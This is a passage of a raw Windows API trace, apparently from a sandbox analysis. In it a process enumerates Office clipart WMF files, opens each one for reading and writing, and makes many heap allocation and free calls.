nFileSizeHigh=0x0, nFileSizeLow=0xc9c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN04355_.WMF", cAlternateFileName="")) returned 1 [0101.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0101.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0101.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0101.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0101.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0101.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0101.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0101.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0101.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0101.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0101.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0101.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a2d0 [0101.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0101.758] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.758] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.758] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.758] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0101.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.758] AreFileApisANSI () returned 1 [0101.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0101.758] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.758] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0101.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0101.759] AreFileApisANSI () returned 1 [0101.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b078 [0101.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8b078, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 69 [0101.759] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04355_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.759] GetFileType (hFile=0x33c) returned 0x1 [0101.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0101.759] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.759] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.759] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.760] CloseHandle (hObject=0x33c) returned 1 [0101.760] AreFileApisANSI () returned 1 [0101.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a9f0 [0101.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8a9f0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 69 [0101.760] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04355_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.760] GetFileType (hFile=0x33c) returned 0x1 [0101.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a9f0 | out: hHeap=0x20000) returned 1 [0101.760] CloseHandle (hObject=0x33c) returned 1 [0101.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0101.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0101.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0101.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0101.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0101.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0101.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0101.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0101.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.762] AreFileApisANSI () returned 1 [0101.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a660 [0101.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8a660, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 69 [0101.762] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04355_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc63b1c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc63b1c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc9c)) returned 1 [0101.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0101.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0101.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0101.762] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.762] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.762] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x12c8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN04369_.WMF", cAlternateFileName="")) returned 1 [0101.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0101.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0101.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0101.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0101.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0101.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0101.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0101.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0101.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0101.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0101.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0101.763] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.763] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.763] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.763] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0101.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.763] AreFileApisANSI () returned 1 [0101.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0101.763] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.763] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0101.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0101.763] AreFileApisANSI () returned 1 [0101.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0101.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 69 [0101.763] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04369_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.764] GetFileType (hFile=0x33c) returned 0x1 [0101.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0101.764] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.765] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.765] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.765] CloseHandle (hObject=0x33c) returned 1 [0101.765] AreFileApisANSI () returned 1 [0101.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a828 [0101.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x8a828, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 69 [0101.765] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04369_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.765] GetFileType (hFile=0x33c) returned 0x1 [0101.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0101.765] CloseHandle (hObject=0x33c) returned 1 [0101.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0101.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0101.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0101.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0101.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0101.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0101.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) 